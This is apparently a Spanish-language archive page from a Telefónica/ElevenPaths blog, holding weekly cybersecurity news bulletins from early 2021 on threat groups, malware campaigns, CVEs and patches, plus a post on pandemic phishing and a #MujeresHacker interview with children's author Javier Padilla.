La pandemia ha acelerado la transición a una vida digital, y con ello se han disparado los ciberataques contra usuarios y empresas. El ataque más frecuente, y que corresponde a la brecha más común, es el phishing. ¿Cuántas veces hemos recibido un correo electrónico, lo hemos abierto y hemos accedido a un enlace o descarga indebida? Tres pasos tan habituales y sencillos que se han convertido en una rutina en las que muchos usuarios caen. Desde el comienzo de la crisis de la Covid-19, los ataques de phishing han crecido un 70%. ¿Sabías que la capacidad de las empresas de contener los ataques ha disminuido un 13% en los últimos cinco años? La pandemia ha obligado a muchas empresas a adecuarse al teletrabajo de manera tan rápida que han dejado brechas de seguridad en sus sistemas. El aumento de plataformas de videoconferencia y la necesidad de información han abierto puntos de ataque que los ciberdelincuentes tratan de aprovechar. Además, son muchos los empleados que han tenido que trabajar con sus dispositivos personales que escapan del control de la organización para saber qué tipos de sistemas operativos utilizan, si están actualizados, si tienen alguna vulnerabilidad causada por distintas aplicaciones instaladas… Tipos de ciberataques Los tipos de ciberataques que están registrando las autoridades durante la pandemia son principalmente el phishing y el smishing, una versión del phishing a través del envío de SMS. Ambos se utilizan de la misma forma, suplantan a un organismo oficial e intentan redirigir al usuario a una página web falsa para que introduzca en ella sus datos personales o descarguen archivos maliciosos. Estos ataques y otros muchos van en aumento a causa de la nueva normalidad que estamos viviendo, pasamos más tiempo en casa y nuestra vida digital aumenta. Ahora, más que nunca, hay que tener especial cuidado en nuestra vida digital, reconocer amenazas y extremar las precauciones a la hora de utilizar la red. Tanto los usuarios como las empresas, grandes y pequeñas, deben tener en cuenta la seguridad de su negocio. Cualquier ciberataque puede tener consecuencias muy negativas para las empresas: pérdidas económicas, impactos reputacionales… por todo ello y más la ciberseguridad y la protección de la información se ha convertido en una necesidad.
31 de marzo de 2021
Boletín semanal de ciberseguridad 20–26 de marzo
Análisis del nuevo grupo de ciberespionaje SilverFish El equipo de PRODAFT Threat Intelligence (PTI) ha descubierto un grupo muy sofisticado de ciberdelincuentes llamado SilverFish, que opera exclusivamente contra grandes empresas e instituciones públicas de todo el mundo, centrándose en la Unión Europea y Estados Unidos. SilverFish utilizaría métodos de gestión modernos, herramientas sofisticadas e incluso su propio sandbox para probar malware contra sistemas, empleando diferentes soluciones AV y EDR empresariales. El grupo estaría usando dominios vulnerados, que en su mayoría utilizan WordPress, para redirigir el tráfico a su servidor de Command & Control (C2). Para ello, SilverFish crea nuevos subdominios para dificultar que el propietario del dominio averigüe que este está siendo explotado. Según la investigación, se ha podido relacionar al grupo SilverFish con los ataques a la cadena de suministro que sufrió SolarWinds. Por otro lado, la infraestructura del grupo habría revelado enlaces a múltiples IoCs previamente atribuidos a TrickBot. Finalmente, los investigadores afirman que es probable que los principales objetivos de SilverFish sean realizar un reconocimiento y filtrar datos de los sistemas víctimas de sus operaciones. Más: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/134742_SilverFish_TLPWHITE.pdf La energética Shell afectada por el incidente de Accellion FTA La petrolera holandesa Shell, presente en 70 países y miembro de la lista Fortune 500, emitió un comunicado la pasada semana donde admitía haber sufrido un incidente de seguridad que ha resultado en la filtración de documentación y archivos confidenciales. Este incidente deriva del compromiso de un tercero acaecido en diciembre de 2020, en concreto, del colaborador IT Accellion. Varias vulnerabilidades del tipo Zero-Day en el software de intercambio de archivos de la firma, llamado Accellion FTA, fueron activamente explotadas por actores amenaza para distribuir malware y exfiltrar los documentos alojados en el sistema. Según Shell, los atacantes no lograron acceder a la infraestructura digital de la entidad al encontrarse el software de intercambio aislado de sus servidores principales. Entre los archivos filtrados se incluye información relativa a las filiales del grupo y a sus socios, así como información personal. Estos datos todavía no han sido divulgados públicamente en la web mantenida por los operadores del ransomware Cl0p, donde otras víctimas del incidente como Kroger o Singtel vieron expuestos sus archivos comprometidos. Toda la info: https://www.shell.com/energy-and-innovation/digitalisation/news-room/third-party-cyber-security-incident-impacts-shell.html Vulnerabilidades en MobileIron MDM El investigador de seguridad Matt Burch de Optiv ha publicado tres vulnerabilidades en MobileIron MDM que, si se encadenan, podrían dar lugar a la vulneración de cuentas de usuario. El primer fallo (CVE-2020-35137) podría permitir a los atacantes descubrir el endpoint de autenticación de MobileIron de una organización ya que la aplicación para dispositivos móviles Mobile@Work almacena la API hardcodeada. La segunda vulnerabilidad (CVE-2020-35138) permitiría construir solicitudes de autenticación de MobileIron y, en determinadas circunstancias, capturar las credenciales mediante un ataque MITM. El último de ellos (CVE-2021-3391), permitiría a los atacantes realizar ataques de enumeración de usuario. Si bien MobileIron todavía no ha publicado actualizaciones que corrijan estos fallos, sí ha proporcionado una serie de recomendaciones para mitigarlos. Asimismo, Optiv ha publicado en GitHub una herramienta para probar estos fallos de seguridad en MobileIron. Más detalles: https://www.optiv.com/explore-optiv-insights/source-zero/mobileiron-mdm-contains-static-key-allowing-account-enumeration Purple Fox adquiere capacidades de gusano e infecta servidores Windows a través de SMB Los investigadores de Guardicore han publicado un informe sobre la capacidad de gusano recientemente adquirida por el malware Purple Fox, con la que infectaría servidores Windows mediante ataques de fuerza bruta contra servicios SMB vulnerables expuestos a Internet a través del puerto 445. Si la autenticación es exitosa, Purple Fox crea un servicio con nombre AC0X (donde X es un número entero del 0 al 9) que descarga el paquete de instalación de MSI de uno de los servidores HTTP de su botnet, la cual cuenta con más de dos mil servidores vulnerados. Este nuevo vector de entrada, observado desde finales de 2020, convive con técnicas de infección anteriores de Purple Fox como la explotación de vulnerabilidades del navegador web o la utilización de campañas de phishing a través de correo electrónico. Info completa: https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/ Vulnerabilidades graves en OpenSSL El equipo de OpenSSL ha emitido un aviso sobre dos vulnerabilidades de gravedad alta, catalogadas como CVE-2021-3449 y CVE-2021-3450. OpenSSL es una librería de software ampliamente utilizada para crear aplicaciones de red y servidores que necesitan establecer comunicaciones seguras. Por un lado, la vulnerabilidad CVE-2021-3449 podría provocar un fallo de denegación de servicio (DoS), debido a la desviación de un puntero NULL que sólo afecta a las instancias de servidor, no a los clientes. Este problema fue reportado a la entidad el 17 de marzo de 2021 por Nokia, siendo la solución desarrollada por Peter Kästle y Samuel Sapalski de la misma firma. Por otro lado, la vulnerabilidad CVE-2021-3450 trata de un error en la validación de certificados de la Autoridad de Certificación (CA), que afecta tanto a las instancias del servidor como de cliente. El fallo fue descubierto el 18 de marzo por el equipo de Akamai y la solución fue desarrollada por Tomáš Mráz. Ambas vulnerabilidades están corregidas en la versión 1.1.1k de OpenSSL, siendo la versión 1.0.2 no afectada por este problema. Todos los detalles: https://www.openssl.org/news/secadv/20210325.txt Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita la página de CyberSecurityPulse.
26 de marzo de 2021
Boletín semanal de ciberseguridad 6–12 de marzo
La botnet FluBot detrás de la campaña de suplantación a empresas de mensajería El pasado viernes, investigadores de Threat Fabric ponían nombre a la amenaza detrás de la campaña de suplantación de empresas de mensajería por SMS. En concreto hablan del malware Cabassous, un troyano bancario descubierto en diciembre de 2020 y cuya afectación estaría muy centrada en España. Por su parte, el investigador de malware de ESET Lukas Stefanko, confirmaba también la vinculación entre las campañas de SMS fraudulentos en España y Polonia que suplantan a empresas de mensajería, y el malware FluBot (aka Cabassous), y facilitaba el enlace a un informe de Prodaft (Proactive Defense Against Future Threats) donde se analiza la actividad ligada a la botnet FluBot. En el informe se recogen algunas de las estadísticas ligadas a la botnet, hablándose de más de 60.000 dispositivos infectados, con un 97% de las víctimas localizado en España. El total de números de teléfono recolectados podría superar los 11 millones (en el momento de la redacción del informe). El objetivo del troyano es la recolección de credenciales bancarias de los usuarios. Sin embargo, además de este objetivo principal y, a diferencia de otros troyanos bancarios, FluBot cuenta con la capacidad de robar la agenda de contactos de sus víctimas y de enviar SMS fraudulentos desde los dispositivos comprometidos. Esta capacidad es la que ha fomentado su rápida y efectiva propagación. Ese mismo día, los Mossos d’Esquadra informaban del desmantelamiento de un grupo criminal especializado en campañas de smishing. Dentro del anuncio de los Mossos no se especificaba que los detenidos eran los operadores de la botnet FluBot, conocida ese mismo día por la mañana gracias a un informe detallado de la firma Prodaft. Sin embargo, uno de los investigadores de Prodaft confirmaba, vinculando el anuncio de los Mossos, que los arrestados eran los operadores de FluBot y que el C&C estaba caído ya desde primera hora de la mañana. Uno de los artículos en prensa que se hacen eco de la desarticulación, El Periódico indica que la investigación, que seguiría aún abierta, habría dado comienzo el pasado mes de octubre de 2020 a raíz de la denuncia de un usuario de la recepción de un sms fraudulento. Estas noticias podrían permitir plantear que la campaña de smishing tan agresiva que venimos viendo en las últimas semanas, podría darse por finalizada. Sin embargo, continúa reportándose en redes sociales la recepción de sms fraudulentos pasado el momento de la desarticulación, por lo que no podemos descartar que el desmantelamiento haya sido únicamente de una parte de la infraestructura. Más información: https://twitter.com/m3karadag/status/1367769424502136832 Fuga de información en diversas aerolíneas debido a un ciberataque contra el proveedor IT SITA El 24 de febrero, SITA, una empresa internacional de telecomunicaciones que provee servicios tecnológicos a empresas de la industria aeronáutica, fue víctima de un incidente de seguridad que afectó a determinados datos de pasajeros almacenados en los servidores de SITA Passenger Service System (SITA PSS). Esta plataforma gestiona los sistemas de compra de billetes, embarque y otras transacciones de usuarios para grandes aerolíneas. Según ha confirmado un representante de SITA a medios digitales, entre las entidades afectadas se encuentran Lufthansa, Air New Zealand, Singapore Airlines, SAS, Cathay Pacific, Jeju Air, Malaysia Airlines y Finnair. En total, se estima que más de dos millones de usuarios finales podrían haberse visto afectados por este incidente. En su propio comunicado, SITA indica que está tomando medidas para ponerse en contacto con todos los clientes de SITA PSS afectados, además de iniciar otras medidas de contención específicas, La investigación sobre el origen del incidente sigue en curso. Info completa: https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/ Boletín de seguridad de Microsoft Microsoft ha publicado su boletín mensual de seguridad para este mes de marzo en el que ha corregido 84 vulnerabilidades, entre las que se encuentran dos vulnerabilidades de día cero, así como otras diez vulnerabilidades de criticidad alta. Los zero-days corregidos son: CVE-2021-27077, elevación de privilegios en Windows Win32k; y CVE-2021-26411, vulnerabilidad de daños de memoria en Internet Explorer. Se tiene constancia de que esta última vulnerabilidad, con criticidad alta, ha sido explotada por el grupo norcoreano Lazarus en el pasado mes de enero. Finalmente, destacar que Microsoft ha lanzado actualizaciones de seguridad para servidores de Microsoft Exchange que actualmente no tienen soporte y que son vulnerables a los ataques de ProxyLogon (CVE-2021-26855), los cuales no son compatibles con los parches lanzados a principios del mes de marzo. Más detalles: https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar Incendio en varios centros de datos de OVH Octave Klava, fundador de OVH anunciaba a las 3:42 de la madrugada vía Twitter la detección de un incendio en uno de sus centros de datos ubicado en Estrasburgo. En concreto el incendio se iniciaba en el centro SBG2 y acababa afectando también a parte de SBG1 poco después, luchando los bomberos por conseguir un aislamiento efectivo de los SBG3 y SBG4. A primera hora de la mañana, Klava anunciaba que el fuego estaba ya controlado pero que no se tenía acceso en esos momentos a ninguno de los cuatro centros. En una nueva actualización realizada a las 10 de la mañana, se anuncia la intención de restaurar durante el día de hoy al menos el servicio prestado desde SBG3 y SBG4, y quizá el de SBG1. En su anuncio inicial del incidente, Klava recomendaba a sus clientes recurrir al plan de recuperación ante desastres de la firma, creado para evitar problemas mayores debidos a la incapacidad de funcionar del servicio. Como consecuencia del incendio, existe una grave afectación en numerosas páginas web alojadas por OVH en estos momentos. Toda la info: https://twitter.com/olesovhcom/status/1369478732247932929 Novedades acerca de ProxyLogon, las vulnerabilidades en Exchange Desde que saliera a la luz la semana pasada la explotación activa de 4 vulnerabilidades 0-day de Microsoft Exchange por parte del actor de origen chino Hafniun, se han publicado nuevas noticias en las que se ha conocido que entre las víctimas de estos ataques se encontraría la Autoridad Bancaria Europea (EBA). Además investigadores de ESET han tenido conocimiento de la explotación de estas vulnerabilidades por otras organizaciones cibercriminales, estando entre estas los operadores del ransomware DearCry. Por su parte Microsoft publicó actualizaciones para corregir estas vulnerabilidades advirtiendo si bien, de la necesidad de seguir correctamente las indicaciones debido a que podrían estarse instalando sin reparar las vulnerabilidades; también ha lanzado actualizaciones de seguridad para servidores sin soporte que son vulnerables. Además, Microsoft ha lanzado un script con el fin de buscar IoCs asociados a estas vulnerabilidades en el sistema, y ha actualizado su herramienta Microsoft Safety Scanner que detecta y elimina webshells. Adicionalmente, el CERT de Letonia ha desarrollado un script que detecta webshells pero sin eliminar los archivos infectados. Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita la página de CyberSecurityPulse.
12 de marzo de 2021
#MujeresHacker: apuesta por tu pasión
#MujeresHacker, la iniciativa global de Telefónica que persigue visibilizar el papel de la mujer dentro del sector tecnológico y concienciar a nuestras niñas sobre su potencial para estudiar carreras STEM, vuelve a lo grande para celebrar este 8 de marzo, Día Internacional de la Mujer, por todo lo alto. #MujeresHacker da el salto internacional, estrenándose en el mundo entero con este segundo vídeo donde se presenta una situación cotidiana, como es una clase de tecnología en un colegio. Por su valentía y ejemplo podrás reconocer a nuestra futura mujer hacker. ¡Dale al PLAY! 👇 Esta fecha tan especial, como es el 8 de marzo, ayuda a reforzar y poner en alza en mensaje de la campaña: potenciar el papel y la capacidad de nuestras niñas, chicas y mujeres para estudiar y formarse en lo que ellas deseen, siendo un ejemplo para muchos. La realidad siempre supera a la ficción y son muchas las #MujeresHacker que cada día nos hacen ver que cualquier persona, independientemente de su género, puede dedicarse a profesiones técnicas y científicas. El camino por perseguir y alcanzar los sueños no entiende de género. Por ello, promover y apostar por una mayor presencia femenina en ambientes de trabajo y carreras profesionales STEM es la meta que persigue esta iniciativa que potenciamos desde Telefónica Tech. Y es que para crear tecnología basta con tener ganas y pasión. Porque la tecnología también se escribe en femenino. ¿te unes a la iniciativa? https://mujereshacker.telefonica.com/
8 de marzo de 2021
Entrevista: hablamos de libros y #MujeresHacker con Javier Padilla
Hace unos días tuvimos la oportunidad de hablar con Javier Padilla, emprendedor en Internet y escritor de los libros protagonizados por la joven hacker Mara Turing, una charla muy agradable que queremos compartir con vosotros. Descubre quién es Javi, su trayectoria y cómo "nació" Mara Turing en esta interesante entrevista. Háblanos de ti Javier Padilla: Pues mira, soy una persona curiosa por naturaleza. Me gusta vivir la vida a lo ancho porque desconocemos su largo, también soy algo hiperactivo y me gustan mucho los retos. Empecé ingeniería y a los dos años me cambié a estudiar la carrera de Periodismo (para disgusto de mi padre). Aprendí a contar historias y, por el camino, me especialicé en Diseño Gráfico e Infografía en mis años por las redacciones de los periódicos. Después, continué aprendiendo a programar hasta que me convertí en CTO del medio online con más tráfico en Andalucía (que era, entonces, ABC de Sevilla; no sé si lo seguirá siendo). Por lo tanto, me gusta mucho aprender a través de la práctica. Así me metí en el mundo de la guitarra y en el de la batería, mis dos instrumentos favoritos, pero también en el del emprendimiento. No soy emprendedor por vocación o por influencia familiar, sino más bien por saciar el hambre interior que me lleva a picar de aquí y allá para aprender a hacer cosas nuevas, crear productos nuevos y, de paso, hacer de eso mi modo de vida. Me gusta vivir la vida a lo ancho porque desconocemos su largo. Te describes como “emprendedor en internet”, ¿a qué te refieres con esta descripción? J.P.: Me refiero a que no sé emprender en otros sectores. Si me pidieran montar una zapatería o una frutería en la calle seguro me costaría bastante trabajo. Seguramente, fracasaría las primeras veces. Sin embargo, con Internet es distinto. Será porque me enganché allá por 1996 y empecé a hacer webs torpemente, a pasar noches en el IRC aprendiendo de gente buena y demás. Es como un ecosistema en el que me siento cómodo, en el que puedo comprender mejor a los usuarios, a los clientes potenciales y demás. Me gusta mucho observar los comportamientos de la gente y ver qué productos o servicios pueden crearse para hacer algo más fácil. Concretamente, hay dos áreas en las que me ha ido bastante bien: comercio electrónico (juguetes; con Nabumbu llegamos a procesar más de 30.000 pedidos anuales) y medios (ElDesmarque, vendido a Mediaset en marzo de 2019). También hay otras en las que me ha ido mal y he perdido tiempo y dinero, pero he sacado mucho aprendizaje válido. Al final, en mi opinión, no es malo caerte, sino caerte y no aprender por qué te has caído. Háblanos sobre tus libros: cómo nacieron, dónde encontraste la inspiración, a quién van dirigidos... J.P.: El otro día hablaba con una amiga sobre el nacimiento de Mara Turing. Llegamos a la conclusión de que fue un cúmulo de circunstancias. En primer lugar, llevaba mucho tiempo sin escribir y tenía “mono”. Me apetecía mucho contar algo. Había iniciado tres libros los años anteriores, pero los abandoné. Y me doy cuenta de que los dejé a un lado porque no tenía un propósito con ellos. Esto da lugar al segundo motivo: me fijé en cómo manejaban los dispositivos móviles mis sobrinos pequeños y me asusté. No había en sus patrones de uso ningún tipo de control ni de pensamiento sobre “qué hay detrás de este juego” o “qué hay detrás de esta red social”. A eso le uní que llevo años viendo cómo se intenta meter a los jóvenes en programación diciéndole que “será fundamental en el futuro” y cosas así. Cuando fui a Warner en Londres y vi cómo cientos de niños querían ser magos como Harry Potter lo comprendí: no había referentes que convirtieran la programación en algo emocionante, divertido; solo encontraba historias puntuales con muchos estereotipos. Hacker hombre con sudadera y demás. Y, para cerrar el círculo, me pilló todo leyendo una biografía de Alan Turing en la que confirmé lo injusta que fue su vida. Fue todo como una tormenta perfecta. Yo quería crear una aventura emocionante protagonizada por una niña hacker en la que, entre otras cosas, los lectores se interesaran por el mundo de la programación. ¿Por qué pensaste en que la protagonista de Mara Turing y el Despertar de los Hackers debía ser una niña? J.P.: No fui consciente del problema de la falta de mujeres en el ecosistema emprendedor hasta que me convertí en mentor para startups. Cada año veía a 10-15 empresas y nunca —o casi nunca– me encontraba con una mujer emprendedora en tecnología. Casi siempre que aparecían chicas estaban vinculadas a áreas como el marketing, la publicidad o la comunicación. ¿Por qué no había más CEOs que fueran mujeres? Eso me hizo pensar mucho. Así que cuando se creó la tormenta perfecta que comenté en la respuesta anterior, lo tuve claro: la protagonista de mi libro sería una mujer que rompiera estereotipos y, a poder ser, desde la normalidad. Cuando doy charlas en los colegios siempre les planteo la misma pregunta a los peques: si el mundo tecnológico del mañana lo disfrutarán y usarán hombres y mujeres al 50%, ¿por qué lo tienen que diseñar solo hombres? Necesitamos más mujeres en ingeniería y al frente de empresas tecnológicas. Si Mara Turing inspiraba a un 5% de las lectoras a embarcarse en el mundo de la programación ya habría conseguido mi objetivo. Si el mundo tecnológico del mañana lo disfrutarán y usarán hombres y mujeres al 50%, ¿por qué lo tienen que diseñar solo hombres? ¿Ha llegado el libro realmente a manos de niñas? ¿Crees que han podido cambiar algo su percepción respecto a un mundo hacker y femenino? J.P.: ¡Sí! Y eso me hace muy feliz. La comunidad de lectoras de Mara Turing es muy especial para mí. Algunas niñas se han apuntado a clases de programación después de leerlo. Incluso hay un caso de una chica que ha ganado un concurso de programación de robots a nivel nacional y que se inició en esta área hace 3 años al leer el primer libro. De hecho, en la tienda de MaraTuring.com —que es donde yo puedo tener datos más cercanos— prácticamente he dedicado el 50% de los libros a niños y el 50% a niñas. Y son más de 3.000 ya solo desde la página, que es la vía más pequeña de ventas. Después están los círculos más potentes como Amazon y demás, donde no sé exactamente el tanto por ciento de lectores versus lectoras, pero por las respuestas en redes y demás, creo que hemos conseguido llegar con esta historia al público femenino. ¿Cuál crees que es el motivo por el que el número de niñas que estudian ingeniería es menor que la de niños? J.P.: No lo tengo claro. Creo que un factor importante es la falta de referentes claros. ¡Y hay muchos! Pero no son famosos, no salen en TV. Hasta hace poco no se hablaba del papel de la mujer en Bletchley Park cuando se descifraron los códigos de la Máquina Enigma. Pero no solo ahí. No se hablaba de las mujeres involucradas en el primer viaje a la Luna. Para las chicas no ha sido fácil encontrar en el entorno a mujeres con historias que convirtieran la ingeniería en una aspiración. En los últimos 5 o 10 años han comenzado a salir películas y libros que empiezan a revertir esta tendencia. Y me parece fundamental. No hay que empujar a que las mujeres sean programadoras, pero sí explicarles que es una profesión bonita, con muchas posibilidades y, en líneas generales, mejor remunerada que otras. ¿Qué crees que deberíamos hacer para cambiar esto? J.P.: Es un trabajo de todos. Un trabajo que empieza en el ámbito familiar y que debe continuar en el colegio. Los padres no deben empujar a sus hijas a profesiones tradicionalmente de mujeres. Hay que abrir el abanico y mostrarles todo el ecosistema. Hay mucho de storytelling en esto. La narrativa creo que es fundamental para conseguir romper ese círculo vicioso que mantiene al hombre como líder absoluto en este ámbito. Por eso intento apoyar cualquier iniciativa en la que se ponga a la mujer en el centro del ámbito STEM. Por ejemplo, el canal ValPat de Youtube, de Valeria y Patricia, me parece fantástico. Ellas cuentan muy bien las cosas y tienen a una legión de fans detrás. Todo suma. Pero si tuviera que elegir una palanca de cambio elegiría, sin duda, las historias que convierten la ingeniería en una aspiración. Recientemente hemos tenido un ejemplo con la serie Gambito de Dama. Una chica que juega al ajedrez y es una estrella que consigue que se multiplique el número de mujeres que compran tableros y juegan. Iniciativas así, sostenidas en el tiempo, son muy necesarias. No puede ser flor de un día. La narrativa creo que es fundamental para conseguir romper ese círculo vicioso que mantiene al hombre como líder absoluto en este ámbito. ¿Has oído hablar de la iniciativa #MujeresHacker? ¿Qué te parece? J.P.: Pues qué me va a parecer… ¡Fantástica! Efectivamente, muchas chicas pierden en la adolescencia esa inclinación hacia el mundo STEM. Por eso, cuando hablo con mujeres hackers —en España hay muchas y muy buenas—, me intereso mucho por el camino que las llevó ahí. Y en él hay mucho de inspiración. #MujeresHacker hace, en mi opinión, exactamente eso: inspirar. Cuando tú inspiras a una chica puede que conviertas la ingeniería en una aspiración o, como mínimo, en una opción más que brilla entre las otras. Necesitamos más iniciativas como esta, no solo en España, sino en todo el mundo. Y creo que sería especialmente interesante que llegaran a los ámbitos rurales. Allí veo cosas que pueden sonar todavía al pasado, pero que son un presente muy preocupante. Creo que #MujeresHackers es como una luz en el camino. Otra más. Una luz que debe iluminar el exterior y el interior de esas chicas para que descubran atractivos, alicientes e historias que, como mínimo, conviertan la programación y la ingeniería en una alternativa válida para ellas. Cuando tú inspiras a una chica puede que conviertas la ingeniería en una aspiración o, como mínimo, en una opción más que brilla entre las otras. Vídeo completo de la entrevista ya disponible: Si quieres saber más sobre el movimiento #MujeresHacker, no te pierdas todo el contenido en la página web oficial.
5 de marzo de 2021
Boletín semanal de ciberseguridad 27 de febrero - 5 de marzo
HAFNIUM ataca servidores de Microsoft Exchange con exploits 0-day Microsoft ha detectado el uso de múltiples exploits 0-day para llevar a cabo ataques dirigidos contra las versiones on premise de Microsoft Exchange Server (2013, 2016 y 2019); Exchange Online no se ve afectado por estas vulnerabilidades. En concreto, las vulnerabilidades explotadas fueron las siguientes: CVE-2021-26855 CVSS v3 9.1, CVE-2021-26857 / 26858 / 27065 CVSS v3 7.8. Los fallos fueron corregidos en el día de ayer por Microsoft, en una actualización de seguridad extraordinaria. En los ataques observados por Microsoft y la firma de seguridad de Volexity, el grupo HAFNIUM, que se cree podría estar apoyado por el estado chino, habría aprovechado estas vulnerabilidades para acceder a los servidores de Exchange, accediendo así a las cuentas de correo y permitiendo la instalación de malware para lograr persistencia. Tras explotar estas vulnerabilidades, los operadores de HAFNIUM habrían procedido con el despliegue de web shells en los servidores vulnerados para robar datos, cargar o descargar archivos y ejecutar comandos. Toda la información: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ Google corrige el segundo 0-day en Chrome este año El pasado 2 de marzo, Google lanzó la versión 89.0.4389.72 de Chrome para Windows, Mac y Linux, que se irá implementando de manera progresiva en la base de usuarios durante los próximos días. Esta actualización incluye la corrección de 47 fallos de seguridad en total, uno de los cuales sería un 0-day de alto riesgo que afecta al ciclo de vida de los objetos en un audio. La vulnerabilidad fue reportada a mediados de febrero por el equipo de Microsoft y se le ha otorgado el identificador CVE-2021-21166. A pesar de que se ha indicado la existencia de un exploit para esta vulnerabilidad, por el momento, y como es habitual en Google, no han dado más detalles sobre su explotación a fin de garantizar la seguridad de la base de usuarios. El parcheado de esta nueva vulnerabilidad en Chrome, se produce después de que en febrero, Google corrigiese otro 0-day que podía ser aprovechado por los atacantes para ejecutar código arbitrario en sistemas que ejecutasen versiones previas de Chrome. Este tipo de vulnerabilidades han sido explotadas en distintos ataques como la campaña contra los investigadores de ciberseguridad de finales de enero. Más detalles: https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html Actualización sobre el compromiso en la cadena de suministro: nuevos artefactos Microsoft ha descubierto nuevas familias de malware en los sistemas de las víctimas del compromiso de Solarwinds, y ha denominado al sofisticado grupo detrás del ataque como Nobelium. GoldMax, Sibot y GoldFinder son las tres nuevas variantes detectadas, que fueron usadas por Nobelium en la segunda fase de despliegue tras utilizar Teardrop para moverse lateralmente. Pese a haber sido observadas entre agosto y septiembre, se cree que fueron desplegadas en los sistemas comprometidos de los clientes de Solarwinds ya en junio de 2020. Desde Microsoft afirman que estas nuevas variantes fueron utilizadas para mantener la persistencia y realizar acciones muy específicas y dirigidas después del compromiso inicial, incluso evadiendo la detección durante la respuesta al incidente. Adicionalmente, desde FireEye también han publicado información sobre una nueva backdoor desplegada en la segunda fase de una organización comprometida por los atacantes de Solarwinds. Este nuevo malware se ha denominado Sunshuttle y estaría asociado también al grupo UNC2452 (Nobelium, SolarStorm, StellarPaarticle o Dark Halo). Pese a que Microsoft y FireEye no han relacionado estas familias, parece tratarse del mismo malware ya que comparten funcionalidades y el C2. Para saber más: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ Supermicro y Pulse Secure lanzan actualizaciones frente a TrickBoot Las compañías Supermicro y Pulse Secure han publicado sendos avisos para alertar de la existencia de una vulnerabilidad en sus placas base frente al módulo de infección de firmware UEFI del malware TrickBot, conocido como “TrickBoot”. Esta vulnerabilidad en el firmware fue descubierta el año pasado por Advanced Intelligence y Eclypsium. Un dispositivo es vulnerable cuando el firmware UEFI presenta la protección contra escritura desactivada o mal configurada, lo que otorga al malware capacidades de lectura, modificación e incluso borrado del propio firmware. Esto expondría al equipo a actividades maliciosas como el bloqueo del dispositivo, la elusión de los controles de seguridad del sistema operativo o reinfecciones del sistema, incluso después de una reinstalación completa. Este código malicioso implantado en el firmware (bootkits) es invisible para cualquier solución de seguridad que opere en el sistema operativo ya que se carga en la etapa inicial de la secuencia de arranque del dispositivo. Supermicro ha anunciado que sus placas base X10 UP son vulnerables a este ataque, y ha lanzado la actualización crítica de la BIOS 3.4 para activar la protección contra escritura. Por su parte Pulse Secure ha lanzado también una actualización de su BIOS para dispositivos que ejecuten Pulse Connect Secure o Pulse Policy Secure, por el mismo motivo. Todos los detalles: https://www.bleepingcomputer.com/news/security/supermicro-pulse-secure-release-fixes-for-trickboot-attacks/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita la página de CyberSecurityPulse.
5 de marzo de 2021
Boletín semanal de ciberseguridad 13-19 febrero
Vulnerabilidad de elevación de privilegios en Windows Defender El investigador de SentinelLabs Kasif Dekel ha descubierto una nueva vulnerabilidad en Windows Defender que podría llevar activa más de doce años. El fallo, catalogado como CVE-2021-24092, con un CVSS de 7.8, permitiría a un atacante no autenticado llevar a cabo una escalada de privilegios en el sistema vulnerable, siendo la complejidad de explotación baja. La vulnerabilidad, corregida en el boletín del 9 de febrero, residiría en el driver encargado de eliminar recursos del sistema, denominado BTR.sys, y se encuentra presente en todas las versiones de Windows Defender a partir de 2009. Desde Microsoft informan que no se ha detectado explotación activa y que todos aquellos usuarios que tengan actualizado Windows Defender a la última versión no se verían afectados. Toda la información: https://labs.sentinelone.com/cve-2021-24092-12-years-in-hiding-a-privilege-escalation-vulnerability-in-windows-defender/ Francia vincula al grupo ruso Sandworm con ataques a proveedores de alojamiento web La Agencia Nacional de Ciberseguridad francesa (ANSSI) ha publicado un informe vinculando al grupo ruso Sandworm con una serie de ataques ocurridos entre 2017 y 2020 contra varias entidades tecnológicas francesas, específicamente, proveedores de alojamiento web. La campaña se dirigía al compromiso de servidores expuestos online que funcionasen con el software Centreon, dedicado a la monitorización IT. Todavía se desconoce si el acceso a los mismos se logró mediante un compromiso de la cadena de suministro o mediante la explotación de vulnerabilidades específicas del software. Una vez logrado el compromiso inicial, el actor amenaza desplegaba las puertas traseras Exaramel y PAS Web Shell (también conocida como Fobusell) en las redes afectadas, utilizando servicios públicos y privados de anonimización VPN para comunicarse con el servidor de Command & Control. ANSSI ha publicado indicadores de compromiso para esta amenaza en formato JSON MIST, así como reglas YARA y SNORT para su detección. Más detalles: https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-005/ QNAP corrige una vulnerabilidad en Surveillance Station QNAP ha corregido una vulnerabilidad de desbordamiento de búfer basado en pila que afecta a los dispositivos NAS que ejecuten una versión vulnerable del software Surveillance Station. Este fallo, catalogado como CVE-2020-2501 y con una severidad crítica asignada por el fabricante, permitiría a los atacantes ejecutar código arbitrario y, además, podría alterar servicios de seguridad o soluciones de antivirus que se ejecuten en el dispositivo vulnerable. QNAP ha parcheado la vulnerabilidad en las versiones Surveillance Station 5.1.5.4.3 para los sistemas operáticos de 64 bits, así como Surveillance Station 5.1.5.3.3 para los sistemas operativos de 32 bits. Más detalles: https://www.qnap.com/en/security-advisory/qsa-21-07 RIPE NCC sufre un ataque de credential stuffing El Registro Regional de Internet para Europa, Oriente Medio y Asia Central, RIPE Network Coordination Centre (NCC), ha emitido un comunicado en el que indica haber sido víctima de un ataque de relleno de credenciales (conocido como credential stuffing) contra su servicio de inicio de sesión único (SSO) RIPE NCC Access, el cual permite acceder a varias aplicaciones o servicios con un único conjunto de credenciales. Desde la compañía han informado que, a pesar de haber sufrido alguna interrupción en el servicio, el ataque fue mitigado con éxito y que, tras una primera investigación, no han detectado cuentas vulneradas. Sin embargo, indican que las investigaciones siguen en curso y que informarán individualmente 